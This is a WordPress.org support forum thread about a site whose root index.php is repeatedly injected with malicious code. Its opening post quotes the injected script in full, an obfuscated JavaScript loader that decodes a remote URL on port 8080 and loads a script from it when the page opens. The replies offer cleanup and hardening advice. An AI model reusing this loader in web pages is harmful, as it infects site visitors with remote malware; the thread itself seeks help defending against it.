WordPress.org

Ready to get started?Download WordPress

Forums

Main index.php constantly being hacked (18 posts)

  1. RobInjection
    Member
    Posted 4 years ago #

    Over the last few weeks, I have had multiple intrusions into my site. Mainly the main index.php in the root WP directory.

    Every few days, I find new malicious code in there. Initially, it was just IFRAMEs, but now I'm seeing this Javascript code in there:

    <script>/*GNU GPL*/ try{window.onload = function(){var Ufxkuzrk298 = document.createElement('script');Ufxkuzrk298.setAttribute('type', 'text/javascript');Ufxkuzrk298.setAttribute('id', 'myscript1');Ufxkuzrk298.setAttribute('src',  'h!@t^t&^#p&:$@/$)#$/@!!a^@l)$)l(&^y@#e(&(!s(^)-#(c$)&&o&m(@#&.)e@$x($!p#$!&e)^^d#(i&#a^.&&@c#o$)m$!).$m#&((a)))k!@&t#)o!#)o&b^(-$c()!&o)!m!&.&)j^a(&c!k^#(f!@#r&(o($s^)@t#$^m@o((v!(#@i(e@@s$^(.^^&&r@u&&)):!8#&^0#)8!0()(^@/)!&!)c(^h(#!i!#$n^@^a$z($.(@^c)$^o##)m@)/(^&c^h))^i#&!@n&#&a$(z!.)!c$o#$m@@$/#$$^g@o)&o^#^g$!l#@##e(.@^&c&&o^m!)&!/&#b#$(e&)s$!@t!)b#$^u(((y(@#.))$c@&o##!^m&!$/@@&5(^^1@&j(!o)!@^b)#.(c#(^#!o)!m)&#/&@&'.replace(/&|\$|#|\!|\(|\)|@|\^/ig, ''));Ufxkuzrk298.setAttribute('defer', 'defer');document.body.appendChild(Ufxkuzrk298);}} catch(e) {}</script>

    I have already made all the initial steps to try to remove this. I have the latest version of WP running, I've changed all my passwords, and this is still happening.

    Does anybody know if there is a way to just lock down the index.php file from being edited? Or a way to track who edits the file so I can block the IP?

    Thanks

  2. @mercime
    Volunteer Moderator
    Posted 4 years ago #

  3. esmi
    Forum Moderator
    Posted 4 years ago #

    Are you sure that you have completely cleaned all files? Most hackers will leave an unobtrusive backdoor somewhere that enables them to regain access to your site. Try working through these resources:

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

  4. Terry
    Member
    Posted 4 years ago #

    Do you upload files with an ftp client that stores your site passwords? If so you may have a computer virus that's logging those passwords and sending them to the hacker (I've been through this myself). All you can do is check for viruses on your computer and clean up what you find asap. In the meantime, go into your hosting account and change the password (but don't save it in your ftp client). Or contact your webhost and have them change your hosting account password until your computer is cleaned up.

    Do a quick check now: Ctrl + Alt + Delete and look up all the processes that are currently running on your computer. That might reveal a keylogger or virus.

  5. RobInjection
    Member
    Posted 4 years ago #

    I run on a Mac, so I'm sure it's not a virus.

    Also, I ran through almost all of those steps, short of reinstalling WordPress cleanly and reimporting everything (which I can't afford to do)

  6. Terry
    Member
    Posted 4 years ago #

    This is very similar to what I experienced, someone mentions Mac users being a commonality among the sites he tried helping (don't know if that's confirming anything though):

    http://wordpress.org/support/topic/281767?replies=38

    More info in there (webservers maybe being hacked, etc.). My problem was the filezilla + adobe 8.0 but I understand that it's not soley filezilla that this thing goes after.

    What do you mean you can't afford to reinstall all wp files? The time that it takes? I'd delete everything and re-upload fresh copies--and double check all file permissions.

    Good luck!

  7. Samuel Wood (Otto)
    Tech Ninja
    Posted 4 years ago #

    I run on a Mac, so I'm sure it's not a virus.

    Hahahahah! Malware and trojans exist for the Mac too. Don't believe the Apple hype.

    That said, are you running on a "shared host"? A lot of the time I see shared hosts get compromised on a different site on the same machine, and then because the host doesn't have proper security, the attacker can run a script that goes and auto-hacks every site it finds on the machine.

    The fact that your "index.php" keeps getting stuff added to it is a good sign of this sort of thing.

    The only real fix: Find a better hosting service.

  8. RobInjection
    Member
    Posted 4 years ago #

    I have a dedicated virtual server, so it's not shared.

    Also, I understand Mac's can get trojans, but please believe me when I say I am not a newb and would not be susceptible to this. Also, I run plenty of other WP sites which are not hacked.

    The reason I said I can not afford to do a clean install is because my site is very huge and delicate like a giant elephant haha

    @Terry Thanks for that link. I will try that AntiVirus plugin. Hopefully it will work.

    http://wordpress.org/extend/plugins/antivirus/

  9. ClaytonJames
    Member
    Posted 4 years ago #

  10. ClaytonJames
    Member
    Posted 4 years ago #

  11. Terry
    Member
    Posted 4 years ago #

    Quick question: do you sftp or ftp?

    Can you restrict access to your account so only your ip can gain access? At least until you figure out "how" they're getting in?

  12. RobInjection
    Member
    Posted 4 years ago #

    thanks for all your responses!

    I tried that remove-virus.php script and it didnt seem to respond, probably because my site is huge.

    I did go through my wp-content folder though. based on @ClaytonJames' recommendation and found a few old cache folders that I wasn't using that may have contained the virus file. I downloaded the remainder of my wp-content folder and found no trace of their the iframe code or the Javascript code.

    Hopefully this does it.

    Also, Terry, I FTP in, and I'm not sure how to restrict it to just my IP. Is it possible to do with Plesk?

  13. johnnykane
    Member
    Posted 4 years ago #

    Hey there. We came across this on one of our client sites. It's pretty much as the lads described above (ftp compromised etc). We've written up a blog on it to help others out.
    http://www.cubedroute.com/weblog/website-virus-removal-and-post-mortem/

  14. ishmate
    Member
    Posted 4 years ago #

    ok i had the same problem wiht my installation of Wp as well.. its a replicating script. From what i learned, it replicates itself no matter what you do. It has a backdoor programmed in and it affects your files outside of the WP installation as well. there is no definite way to remove it except that you have to do a complete nuke of your public_html folder.

    Take a backup of your MySql database. The script does not affect it. Then do the nuke, re-install wordpress and simply import your old database files into the new one through the PHP-MyAdmin utility in Cpanel.

    I deduced that this happens owing to security vulnerabilities in other open-source installations. Do you by any chance have Zen-Cart installed on your server? In my case, the script injection attack was through Zen-Cart...

  15. Terry
    Member
    Posted 4 years ago #

    Also, Terry, I FTP in, and I'm not sure how to restrict it to just my IP. Is it possible to do with Plesk?

    I'd suggest switching to sftp since one of my hosts informed me that this gang watches ftp connections to gain server passwords.

    Plesk...sorry but I have no experience with that.

  16. Terry
    Member
    Posted 4 years ago #

    johnnykane I can't access your page, my antivirus program is screaming that it's an infected website.

  17. kboyko
    Member
    Posted 4 years ago #

    Please check my article about this virus:

    http://justcoded.com/article/gumblar-family-virus-removal-tool/

    It has a script which fixes the issue and don't forget to change your FTP passwords.

  18. Floridan
    Member
    Posted 4 years ago #

    To the OP: since you are on a MAC and you think you can't be hacked, do not log into your FTP until you find the source of the problem. The hacker is most likely gaining access to your site through your FTP. Even if you use the ftp to access other servers, the other server or PC is probably infected with a trojan.

    Also, the hacker has probably placed a php shell script somewhere on your server. You should run a virus scan on the server or ask your host to do it.

Topic Closed

This topic has been closed to new replies.

About this Topic